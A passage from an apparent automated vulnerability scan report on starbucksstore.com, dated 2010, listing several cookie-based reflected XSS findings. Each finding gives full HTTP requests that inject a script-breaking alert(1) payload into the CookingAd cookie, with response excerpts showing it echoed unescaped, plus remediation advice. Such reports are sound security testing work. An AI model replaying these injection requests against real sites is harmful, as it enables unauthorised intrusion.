The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52800</script><script>alert(1)</script>53ab4bb2221921484 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/shgaform.asp?cboSubjects=1000&cboSubTopics=100&EMail.x=67&EMail.y=7 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB52800</script><script>alert(1)</script>53ab4bb2221921484; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20750
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=LODAELCBDOILFIIPEOEHDGFF; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:26:07 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTB52800</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>53AB4BB2221921484"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp?error=noselection"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s
...[SNIP]...

3.87. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/links.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15659
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:05 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/links.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/links.asp"
   var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/links.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

3.88. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/track.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18382
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:07 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/track.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/track.asp"
   var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/track.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

3.89. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/include/SearchNav.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/include/SearchNav.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.90. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shabotus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14484
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:38 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shabotus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shabotus.asp"
   var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shabotus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.91. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shourplg.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:10 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shourplg.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shourplg.asp"
   var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shourplg.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.92. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:31 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.93. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp?SKU=309195 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11887
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:26 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ageName="Detail Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Detail Page : 309195 : "
   var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA"
   var s_prop4=""
   var s_prop5="309195 : "
   var s_prop6="/products/shprodde.asp?SKU=309195"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.94. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:00 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.95. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/sitemap.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/products/sitemap.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/sitemap.asp"
   var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/sitemap.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_s
...[SNIP]...

3.96. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/terms.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15962
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:01 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/products/terms.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/terms.asp"
   var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/terms.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.97. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
